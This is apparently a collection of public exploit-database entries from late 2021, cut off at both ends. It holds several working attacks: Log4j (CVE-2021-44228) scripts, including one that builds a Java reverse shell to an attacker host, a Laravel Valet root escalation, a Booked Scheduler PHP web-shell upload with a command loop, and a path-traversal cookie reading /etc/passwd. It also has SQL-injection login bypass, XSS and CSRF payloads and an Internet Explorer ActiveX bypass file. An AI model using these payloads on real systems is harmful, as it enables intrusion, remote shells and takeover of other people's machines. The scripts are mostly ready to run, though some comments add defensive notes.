    parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
    parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
    parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
    args = parser.parse_args()
    return args
# Script entry: copy the CLI options into the module globals that
# Exploit.exploitation() reads, then run the chain. There is no
# ``if __name__ == "__main__"`` guard, so importing this file runs it.
args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport
exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()
# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
# Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0"
# Date: 11/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: N/A
# Version: V2.0
# Tested on: Nginx NVRDVRIPC Web Server
Proof of Concept:
GET /language/lang HTTP/1.1
Referer: http://example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: VulnIP
Connection: Keep-alive
# Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure
# Date: 12/12/2021
# Exploit Author: leonjza
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Version: <= 2.14.1
# CVE: CVE-2021-44228
#!/usr/bin/env python3
# Pure python ENV variable leak PoC for CVE-2021-44228
# Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284
#
# 2021 @leonjza
import argparse
import socketserver
import threading
import time
import requests
# Canned LDAP reply sent to every client. Read as BER it looks like a SEQUENCE
# (messageID 1) holding a BindResponse with resultCode 0, i.e. "bind OK"
# (NOTE(review): decoded by eye, not checked against an LDAP library). The
# vulnerable client then sends its search request, whose first text line
# carries the value the lookup resolved to - see the example in handle().
LDAP_HEADER = b'\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00\x0a'
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    """Minimal fake LDAP endpoint: acknowledge the bind, read the follow-up
    request and print the text the client embedded in it.

    Nothing is served back to the target (no class, no reference); the PoC
    only shows that the lookup was evaluated by echoing the substituted value.
    From the defender's side the tell-tale is an outbound LDAP connection from
    the JVM to an arbitrary host right after a request whose header contained
    a ${jndi:...} string.
    """

    def handle(self) -> None:
        print(f' i| new connection from {self.client_address[0]}')
        sock = self.request
        sock.recv(1024)            # client's first message (presumably the bind); ignored
        sock.sendall(LDAP_HEADER)  # reply "bind succeeded"
        data = sock.recv(1024)     # client's next message, the search request
        data = data[9:] # strip header
        # example response
        #
        # ('Java version 11.0.13\n'
        # '\x01\x00\n'
        # '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b'
        # 'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2')
        # The substituted value is whatever precedes the first newline.
        data = data.decode(errors='ignore').split('\n')[0]
        print(f' v| extracted value: {data}')
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """TCPServer that handles each connection on its own thread."""
    pass
def main():
    """Start the fake LDAP server on a daemon thread, send one HTTP request
    whose User-Agent carries a ${jndi:ldap://...} lookup, then shut down.

    The leaked value, if any, is printed by the handler thread; the HTTP
    response is merely echoed. Two inconsistencies in the option definitions:
    --listen-host's help text says the default is 127.0.0.1 while the default
    is 0.0.0.0, and --exploit-host is both required and given a default.
    """
    parser = argparse.ArgumentParser(description='a simple log4j <=2.14 information disclosure poc '
                                                 '(ref: https://twitter.com/Black2Fan/status/1470281005038817284)')
    parser.add_argument('--target', '-t', required=True, help='target uri')
    parser.add_argument('--listen-host', default='0.0.0.0',
                        help='exploit server host to listen on (default: 127.0.0.1)')
    parser.add_argument('--listen-port', '-lp', default=8888,
                        help='exploit server port to listen on (default: 8888)')
    parser.add_argument('--exploit-host', '-eh', required=True,
                        default='127.0.0.1',
                        help='host where (this) exploit server is reachable')
    parser.add_argument('--leak', '-l', default='${java:version}',
                        help='value to leak. '
                             'see: https://twitter.com/Rayhan0x01/status/1469571563674505217 '
                             '(default: ${java:version})')
    args = parser.parse_args()
    print(f' i| starting server on {args.listen_host}:{args.listen_port}')
    server = ThreadedTCPServer((args.listen_host, args.listen_port),
                               ThreadedTCPRequestHandler)
    # Daemon thread so the process exits even if a handler is still blocked.
    serv_thread = threading.Thread(target=server.serve_forever)
    serv_thread.daemon = True
    serv_thread.start()
    time.sleep(1)
    print(f' i| server started')
    # The lookup is delivered through a logged header; the nested ${...} is
    # resolved by the target and its result becomes the LDAP path.
    payload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}'
    print(f' i| sending exploit payload {payload} to {args.target}')
    try:
        r = requests.get(args.target, headers={'User-Agent': payload})
        print(f' i| response status code: {r.status_code}')
        print(f' i| response: {r.text}')
    except Exception as e:
        print(f' e| failed to make request: {e}')
    finally:
        # Always tear the server down, even when the request failed.
        server.shutdown()
        server.server_close()
# Script entry point.
if __name__ == '__main__':
    main()
# Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 29/11/2021
# Exploit Author: Mansi Singh
# Vendor Homepage: https://wordpress.org/plugins/typebot/
# Software Link: https://wordpress.org/plugins/typebot/
# Tested on Windows
# Reference: https://wpscan.com/vulnerability/2bde2030-2dfe-4dd3-afc1-36f7031a91ea
How to reproduce vulnerability:
1. Install Latest WordPress
2. Install and activate Typebot Version 1.4.3
3. Navigate to Typebot setting >> enter the payload into 'Publish ID or Full URL'.
4. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(1)>
5. You will observe that the payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
# Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE)
# Date: 11/12/2021
# Exploit Authors: kozmer, z9fr, svmorris
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Software Link: https://github.com/apache/logging-log4j2
# Version: versions 2.0-beta-9 and 2.14.1.
# Tested on: Linux
# CVE: CVE-2021-44228
# Github repo: https://github.com/kozmer/log4j-shell-poc
import subprocess
import sys
import argparse
from colorama import Fore, init
import subprocess
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
# colorama: reset the terminal colour after every print.
init(autoreset=True)
def listToString(s):
    """Concatenate the strings in ``s`` (an argparse nargs='+' list) into one.

    On any exception - e.g. ``s`` is None because the option was omitted -
    it prints the usage of the module-level ``parser`` created under
    __main__ and exits.
    """
    str1 = ""
    try:
        for ele in s:
            str1 += ele
        return str1
    except Exception as ex:
        parser.print_help()
        sys.exit()
def payload(userip , webport , lport):
    """Write Exploit.java (a class that connects /bin/sh to userip:lport),
    then start the LDAP referral server on a thread and an HTTP server that
    serves the compiled class from the current directory.

    ``webport`` is the HTTP server port; ``lport`` is the port the Java class
    connects back to. Never returns normally: serve_forever() blocks.
    """
    genExploit = (
"""
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="%s";
int port=%s;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""") % (userip, lport)
    # writing the exploit to Exploit.java file
    try:
        f = open("Exploit.java", "w")
        f.write(genExploit)
        f.close()
        print(Fore.GREEN + '[+] Exploit java class created success')
    except Exception as e:
        # NOTE(review): Python exceptions have no toString(); this line raises
        # AttributeError and masks the original error.
        print(Fore.RED + f'[-] Something went wrong {e.toString()}')
    checkJavaAvailible()
    print(Fore.GREEN + '[+] Setting up fake LDAP server\n')
    # create the LDAP server on new thread
    # (createLdapServer's second parameter is named lport but receives webport)
    t1 = threading.Thread(target=createLdapServer, args=(userip,webport))
    t1.start()
    # start the web server
    httpd = HTTPServer(('localhost', int(webport)), SimpleHTTPRequestHandler)
    httpd.serve_forever()
def checkJavaAvailible():
    """Exit unless the JDK bundled at ./jdk1.8.0_20/bin/java runs.

    Only the exit status of ``java -version`` is checked; its output is
    discarded. Any non-zero status (including a missing binary being reported
    as an error by call()) ends the program.
    """
    javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
    if(javaver != 0):
        print(Fore.RED + '[-] Java is not installed inside the repository ')
        sys.exit()
def createLdapServer(userip, lport):
    """Compile Exploit.java with the bundled javac and run marshalsec's
    LDAPRefServer, which refers lookups to http://userip:lport/#Exploit.

    ``lport`` is the HTTP server port here (the caller passes ``webport``),
    not the shell port. Prints the ${jndi:ldap://...} string the caller has
    to get logged by the target; blocks while the reference server runs.
    """
    sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
    print(Fore.GREEN +"[+] Send me: "+sendme+"\n")
    subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])
    url = "http://{}:{}/#Exploit".format(userip, lport)
    subprocess.run(["./jdk1.8.0_20/bin/java", "-cp",
                    "target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url])
def header():
    """Print the CVE id and repository banner in blue."""
    print(Fore.BLUE+"""
[!] CVE: CVE-2021-44228
[!] Github repo:
https://github.com/kozmer/log4j-shell-poc
""")
# Script entry: ``parser`` is deliberately module-level because
# listToString() falls back to parser.print_help(). Each option is collected
# with nargs='+' and joined back into a single string.
if __name__ == "__main__":
    header()
    try:
        parser = argparse.ArgumentParser(description='please enter the values ')
        parser.add_argument('--userip', metavar='userip', type=str,
                            nargs='+', help='Enter IP for LDAPRefServer & Shell')
        parser.add_argument('--webport', metavar='webport', type=str,
                            nargs='+', help='listener port for HTTP port')
        parser.add_argument('--lport', metavar='lport', type=str,
                            nargs='+', help='Netcat Port')
        args = parser.parse_args()
        #print(args.userip)
        payload(listToString(args.userip), listToString(args.webport), listToString(args.lport))
    except KeyboardInterrupt:
        print(Fore.RED + "user interupted the program.")
        sys.exit(0)
# Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)
# Exploit Author: leonjza
# Vendor Homepage: https://laravel.com/docs/8.x/valet
# Version: v1.1.4 to v2.0.3
#!/usr/bin/env python2
# Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation (macOS)
# February 2017 - @leonjza
# Affected versions: At least since ~v1.1.4 to v2.0.3. Yikes.
# Reintroduced in v2.0.7 via the 'trust' command again.
# This bug got introduced when the sudoers files got added around
# commit b22c60dacab55ffe2dc4585bc88cd58623ec1f40 [1].
# Effectively, when the valet command is installed, composer will symlink [2]
# the `valet` command to /usr/local/bin. This 'command' is writable by the user
# that installed it.
#
# ~ $ ls -lah $(which valet)
# lrwxr-xr-x 1 leonjza admin 51B Feb 25 00:09 /usr/local/bin/valet -> /Users/leonjza/.composer/vendor/laravel/valet/valet
# Running `valet install`, will start the install [3] routine. The very first action
# taken is to stop nginx (quietly?) [4], but runs the command with `sudo` which
# will prompt the user for the sudo password in the command line. From here (and in fact
# from any point where the valet tool uses sudo) the command can execute further commands
# as root without any further interaction needed by the user.
# With this 'sudo' access, the installer does its thing, and eventually installs two new
# sudoers rules for homebrew[5] and valet[6].
# ~ $ cat /etc/sudoers.d/*
# Cmnd_Alias BREW = /usr/local/bin/brew *
# %admin ALL=(root) NOPASSWD: BREW
# Cmnd_Alias VALET = /usr/local/bin/valet *
# %admin ALL=(root) NOPASSWD: VALET
# The problem with the sudoers rules now is the fact that a user controlled script
# (remember the valet command is writable to my user?) is allowed to be run with
# root privileges. More conveniently, without a password. So, to trivially privesc
# using this flaw, simply edit the `valet` command and drop `/bin/bash` in there. :D
# Or, use this lame script you lazy sod.
#
# ~ $ sudo -k
# ~ $ python escalate.py
# * Shell written. Dropping into root shell
# bash-3.2# whoami
# root
# bash-3.2# exit
# exit
# * Cleaning up POC from valet command
# [1] https://github.com/laravel/valet/commit/b22c60dacab55ffe2dc4585bc88cd58623ec1f40
# [2] https://github.com/laravel/valet/blob/v2.0.3/composer.json#L39
# [3] https://github.com/laravel/valet/blob/v2.0.3/cli/valet.php#L37-L50
# [4] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Nginx.php#L133
# [5] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Brew.php#L171-L177
# [6] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Valet.php#L40-L46
import os
import subprocess
# Inclusive version window the header reports as affected (v1.1.4 .. v2.0.3);
# main() compares the installed version against both ends.
MIN_VERSION = "1.1.4"
MAX_VERSION = "2.0.3"
# Line that main() inserts as the second line of the `valet` script and that
# cleanup_poc_from_command() later compares byte for byte in order to remove it.
POC = "/bin/bash; exit;\n"
def run_shit_get_output(shit_to_run):
    """Spawn *shit_to_run* through the shell and return the Popen handle.

    stdout and stderr are both piped; the caller is responsible for reading
    them.  Because ``shell=True`` is used, the argument is interpreted by
    ``/bin/sh``, so it must never be assembled from untrusted input.
    """
    pipes = {"stdout": subprocess.PIPE, "stderr": subprocess.PIPE}
    return subprocess.Popen(shit_to_run, shell=True, **pipes)
def version_tuple(v):
    """Turn a dotted version string such as ``"2.0.3"`` into ``(2, 0, 3)``.

    Every dot-separated component must be an integer; the resulting tuple
    compares correctly with ``<``/``>=`` (``(1, 1, 4) < (2, 0, 3)``), which
    is how main() checks the affected range.
    """
    components = v.split(".")
    return tuple(int(component) for component in components)
def get_valet():
    """Locate the `valet` executable via `which valet`.

    Returns the stripped path when the output mentions `bin/valet`, else
    None.  Written for Python 2 (see the shebang above): on Python 3
    `p.stdout.readlines()` yields bytes and the ''.join() would raise.
    """
    p = run_shit_get_output('which valet')
    lines = ''.join(p.stdout.readlines())
    # Substring test, not a full-path compare: any location ending in
    # bin/valet (the header shows /usr/local/bin/valet) is accepted.
    if 'bin/valet' in lines:
        return lines.strip()
    return None
def get_valet_version(valet_location):
    """Run the valet command itself and pull the version out of its banner.

    Reads at most 25 bytes of stdout, takes the first line, splits it on
    spaces and returns the third token.  Presumably the banner's first
    line has the shape `<name> <word> <version>` -- TODO confirm against the
    affected releases; any other layout raises IndexError here.
    """
    p = run_shit_get_output(valet_location)
    v = p.stdout.read(25)
    return v.split("\n")[0].split(" ")[2]
def can_write_to_valet(valet_location):
    """Report whether the current user may write to *valet_location*.

    Thin wrapper around ``os.access(..., os.W_OK)``; a path that does not
    exist is reported as not writable.
    """
    writable = os.access(valet_location, os.W_OK)
    return writable
def cleanup_poc_from_command(command_location):
    """Remove the POC line that main() inserted as line 2 of the valet command.

    Reads the whole file; if the second line equals POC exactly, drops it and
    rewrites the file, otherwise prints a request for manual review.  Both
    branches end in a bare `return`.  Assumes the file has at least two lines
    (true after main() ran); a shorter file would raise IndexError.
    """
    with open(command_location, 'r') as vc:
        command_contents = vc.readlines()
    if command_contents[1] == POC:
        print('* Cleaning up POC from valet command')
        command_contents.pop(1)
        with open(command_location, 'w') as vc:
            vc.write(''.join(command_contents))
        return
    print('* Could not cleanup the valet command. Check it out manually!')
    return
def main():
    """Demonstrate the sudoers / writable-script flaw described in the header.

    Flow: locate the valet command and bail if absent; if its second line is
    already POC, run `sudo <valet>` and clean up; otherwise gate on the
    [MIN_VERSION, MAX_VERSION] window and on write access, insert POC as line
    2, run `sudo <valet>`, then remove POC again.

    Root cause (per the header): a NOPASSWD sudoers rule for
    /usr/local/bin/valet, which is a symlink into a user-writable composer
    directory.  The fix belongs in the sudoers rule, which must only name
    root-owned, non-writable targets.
    """
    valet_command = get_valet()
    if not valet_command:
        print(' * The valet command could not be found. Bailing!')
        return
    # get the content so we can check if we already pwnd it
    with open(valet_command, 'r') as vc:
        command_contents = vc.readlines()
    # check that we havent already popped this thing
    if command_contents[1] == POC:
        print('* Looks like you already pwnd this. Dropping into shell anyways.')
        # Relies on the passwordless sudoers entry quoted in the header.
        os.system('sudo ' + valet_command)
        cleanup_poc_from_command(valet_command)
        return
    current_version = get_valet_version(valet_command)
    # ensure we have a valid, exploitable version
    if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \
            or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)):
        print(' * Valet version {0} does not have this bug!'.format(current_version))
        return
    # check that we can write
    if not can_write_to_valet(valet_command):
        print('* Cant write to valet command at {0}. Bailing!'.format(valet_command))
        return
    # drop the poc line and write the new one
    command_contents.insert(1, POC)
    with open(valet_command, 'w') as vc:
        vc.write(''.join(command_contents))
    print('* Shell written. Dropping into root shell')
    # drop in the root shell :D
    os.system('sudo ' + valet_command)
    cleanup_poc_from_command(valet_command)
if __name__ == '__main__':
    # Script entry point; main() reports its own failures via print().
    main()
# Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
# Vulnerability founder: AkkuS
# Date: 13/12/2021
# Exploit Author: 0sunday
# Vendor Homepage: https://www.bookedscheduler.com/
# Software Link: N/A
# Version: Booked Scheduler 2.7.5
# Tester on: Kali 2021.2
# CVE: CVE-2019-9581
#!/usr/bin/python3
import sys
import requests
from random import randint
def login():
    """Log in to the Booked web UI and return the CSRF token from the response.

    Uses the module-level `username`, `password`, `target` and `request`
    (a requests session) assigned at the bottom of the file.  Success is
    judged solely by an HTTP 200 on the POST, which presumably is also what
    a failed login renders -- in that case the token extraction below raises
    IndexError rather than reporting bad credentials.  TLS verification is
    disabled (verify=False).
    """
    login_payload = {
        "email": username,
        "password": password,
        "login": "submit",
        #"language": "en_us"
    }
    login_req = request.post(
        target+"/booked/Web/index.php",
        login_payload,
        verify=False,
        allow_redirects=True
    )
    if login_req.status_code == 200:
        print ("[+] Logged in successfully.")
    else:
        print ("[-] Wrong credentials !")
        exit()
    # Scrape the token out of the HTML: the text after the first
    # `CSRF_TOKEN" value=` occurrence, trimmed to the quoted value.
    return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]
def upload_shell(csrf):
    """POST a hand-built multipart form to the theme-management endpoint.

    The body carries the LOGO_FILE, FAVICON_FILE, CSS_FILE and CSRF_TOKEN
    fields of manage_theme.php; FAVICON_FILE is the part that contains PHP
    rather than an image.  The response is stored in `upload_req` but never
    inspected -- success is only checked afterwards by shell().  Uses the
    module-level `target` and `request`.

    Defender note: the filename and Content-Type in the part are supplied by
    the client and cannot be trusted.  The application-side fix is to verify
    the upload by content, write it under a fixed non-executable path, and
    never serve user-supplied bytes from a .php file.
    """
    # 30-digit random boundary; each part delimiter below repeats it after a run of dashes.
    boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999))
    _headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
        "Accept-Language": "en-US,en;q=0.5",
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary,
        "Origin": target,
        "Connection": "close",
        "Referer": target + "/booked/Web/admin/manage_theme.php?update"
    }
    # Multipart body assembled by string concatenation (LOGO_FILE and CSS_FILE are left empty).
    data = "-----------------------------"+boundary+"\r\n"
    data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n"
    data += "-----------------------------"+boundary+"\r\n"
    data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n"
    data += "Content-Type: application/x-php\r\n\n"
    data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n"
    data += "-----------------------------"+boundary+"\r\n"
    data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n"
    data += "-----------------------------"+boundary+"\r\n"
    data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n"
    data += csrf + "\r\n"
    data += "-----------------------------"+boundary+"--\r\n"
    # In case you need some debugging (unused unless the proxies= line below is enabled)
    _proxies = {
        'http': 'http://127.0.0.1:8080'
    }
    upload_req = request.post(
        target+"/booked/Web/admin/manage_theme.php?action=update",
        headers = _headers,
        data = data
        #proxies=_proxies
    )
def shell():
    """Check that the favicon path now serves the upload, then loop on commands.

    A 200 from /booked/Web/custom-favicon.php is taken as proof that the
    FAVICON_FILE part from upload_shell() is now served from that path; any
    other status exits with code 1.  Afterwards reads commands from stdin
    until the literal `exit` and prints each response body; note that `exit`
    itself is sent once before the loop terminates.

    Detection note: requests to custom-favicon.php carrying a `cmd` query
    parameter are the observable artifact of this activity.
    """
    shell_req = request.get(target+"/booked/Web/custom-favicon.php")
    if shell_req.status_code == 200:
        print("[+] Uploaded shell successfully")
        print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=")
    else:
        print("[-] Shell uploading failed")
        exit(1)
    print()
    cmd = ''
    while(cmd != 'exit'):
        cmd = input("$ ")
        shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd)
        print(shell_req.text)
# Script body.  Positional arguments: <target base URL> <username> <password>;
# any other count prints usage and exits.
if len(sys.argv) != 4:
    print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password")
    exit()
# Module-level globals consumed by login(), upload_shell() and shell().
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
# One session object so the cookie set by login() is reused by the later requests.
request = requests.session()
csrf = login()
upload_shell(csrf)
shell()
# Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
# Date: 13/12/2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.axesstmc.com/cloki/
<!--
Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control
Vendor: Zucchetti Axess S.p.A.
Product web page: https://www.axesstmc.com
Affected version: 1.64
1.63
1.54
Summary: CLOKI is the pre-installed application on our terminals that
provides simple to use access control management and attendance monitoring
using any browser (IE, Chrome, Firefox, etc.). It is suited for anyone
looking for a stand-alone Access Control and Attendance Monitoring system
where the users' data is not frequently changed. Data management is simple
and intuitive and no additional software is needed on the PC intended to be used
as the web base. CLOKI for Access Control also allows configuration and monitoring
of access at all company entrances (doors, gates, turnstiles etc). The Access
Control manages any type of reader, entrance and access credential. Using an
impartial selector it is possible to check that employees do not take company
assets and allows registration of all accesses to the system and all operations
that users carry out.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. These
actions can be exploited to perform authentication detriment and account password
change with administrative privileges if a logged-in user visits a malicious web
site.
Tested on: Start X3 (h02 build 4163)
Start X1 (g01 build 2804)
X1/X2/X3/X4/X7 Web Server
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5689
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php
13.11.2021
-->
CSRF disable AC:
----------------
<!--
  CSRF proof-of-concept: disable access control.
  Points for remediation: the form has no method attribute, so the browser
  submits a GET, and the advisory implies redirect.cgi accepts state changes
  on GET; there is no anti-CSRF token among the fields; and this request
  differs from the "enable" variant that follows only by the absence of
  ACtrl=on.  Mitigations: accept state changes on POST only, bind them to a
  per-session token, and mark the session cookie SameSite so a cross-site
  form submission does not carry it.
-->
<html>
<body>
<form action="http://10.0.0.2:8081/redirect.cgi">
<input type="hidden" name="flagAccessControlChanged" value="true" />
<input type="hidden" name="RAct" value="5" />
<input type="hidden" name="EnR" value="1" />
<input type="hidden" name="ExR" value="1" />
<input type="hidden" name="DenyRTout" value="5" />
<input type="hidden" name="DenyR" value="0" />
<input type="hidden" name="IType" value="0" />
<input type="hidden" name="E485" value="on" />
<input type="hidden" name="GType" value="0" />
<input type="hidden" name="TOO" value="50" />
<input type="hidden" name="TOC" value="50" />
<input type="hidden" name="TOOE" value="100" />
<input type="hidden" name="TOCE" value="100" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF enable AC:
---------------
<!--
  CSRF proof-of-concept: enable access control.
  Same request as the "disable" variant plus ACtrl=on.  As there, the form
  has no method attribute (GET) and no anti-CSRF token, so any page the
  administrator's browser loads can submit it with the administrator's
  session.  Mitigations: POST-only state changes, a per-session token
  checked by redirect.cgi, and a SameSite session cookie.
-->
<html>
<body>
<form action="http://10.0.0.2:8081/redirect.cgi">
<input type="hidden" name="flagAccessControlChanged" value="true" />
<input type="hidden" name="ACtrl" value="on" />
<input type="hidden" name="RAct" value="5" />
<input type="hidden" name="EnR" value="1" />
<input type="hidden" name="ExR" value="1" />
<input type="hidden" name="DenyRTout" value="5" />
<input type="hidden" name="DenyR" value="0" />
<input type="hidden" name="IType" value="0" />
<input type="hidden" name="E485" value="on" />
<input type="hidden" name="GType" value="0" />
<input type="hidden" name="TOO" value="50" />
<input type="hidden" name="TOC" value="50" />
<input type="hidden" name="TOOE" value="100" />
<input type="hidden" name="TOCE" value="100" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass
# Exploit Author: Yehia Elghaly (YME)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
# Version: Online Thesis Archiving System 1.0
# Tested on: Windows, xampp
# CVE: N/A
- Description:SQLi Authentication Bypass
SQL Injection vulnerability exists in Online Thesis Archiving System 1.0. An admin account takeover exists with the payload: admin' # - admin' or '1'='1
PoC:
POST /otas/admin/login.php HTTP/1.1
Host: 192.168.113.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://192.168.113.130
DNT: 1
Connection: close
Referer: http://192.168.113.130/otas/admin/login.php
Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc
Upgrade-Insecure-Requests: 1
username=admin' #&password=admin' #
- Description: Stored Cross Site Scripting (XSS)
Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0.
Steps:
1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum)
2- Add new (curriculum) or (department)
3- Insert your payload <script>("xssyf")</script>
# Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass
# Exploit Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Internet Explorer (MSIE)
Internet Explorer is a discontinued series of graphical web browsers
developed by Microsoft and included in the Microsoft Windows line of
operating systems, starting in 1995.
[Vulnerability Type]
ActiveX Control Security Bypass
[CVE Reference]
N/A
[Security Issue]
Upon opening a specially crafted .MHT file on disk, Internet Explorer
ActiveX control warnings as well as popup blocker privacy settings are
not enforced.
This can allow the execution of ActiveX content with zero warning to
an unsuspecting end user and/or force them to visit arbitrary attacker
controlled websites.
By default when opening browser associated files that contain active
content, MSIE restricts scripts from running without explicit user
interaction and permission.
Instead end users are presented with a yellow warning bar on the
browsers webpage, asking first if they wish to allow the running of
blocked content.
This prevents execution of active content scripts or controls without
the user first clicking the "Allow blocked content" warning bar.
However, specially crafted MHT files residing on disk that contain an
invalid header directive suppress ActiveX warnings and Popup blocker
privacy settings.
Therefore, to bypass Internet Explorer "active content" blocking,
files need to contain a Content-Location header using an arbitrary
named value E.g.
"Content-Location: PBARBAR"
Note: MHT files are often set to open in IE by default, and IE,
while discontinued, is still present on the Windows OS.
Tested successfully on Windows 10 latest fully patched version with
default IE security settings.
Expected result: ActiveX control security warning, prevention of code
execution and blocking browser popup windows.
Actual result: No ActiveX control code execution blocking, security
warnings or browser window popup blocking enforcement.
[PoC Requirements]
MHT file must reside on disk, think targeted attack scenarios.
[Exploit/POC]
Change [VICTIM] value below to a specified user for testing.
1) Create the MHT PoC file.
"MSIE_ActiveX_Control_Security_Bypass.mht"
From:
Subject:
Date:
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html";
boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"
This is a multi-part message in MIME format.
--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001
Content-Type: text/html; charset="UTF-8"
Content-Location: DOOM
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<script>
win=window
win.open("http://www.microsoft.com","","width=600,height=600")
var args = ['height='+1,'width='+1,].join(',')
setTimeout("", 3000)
var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv
________________________________________________________.hta', 'pop',
args)
pop.moveTo(2000,2000)
</script>
</body>
</html>
--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--
2) Create the PoC HTA file.
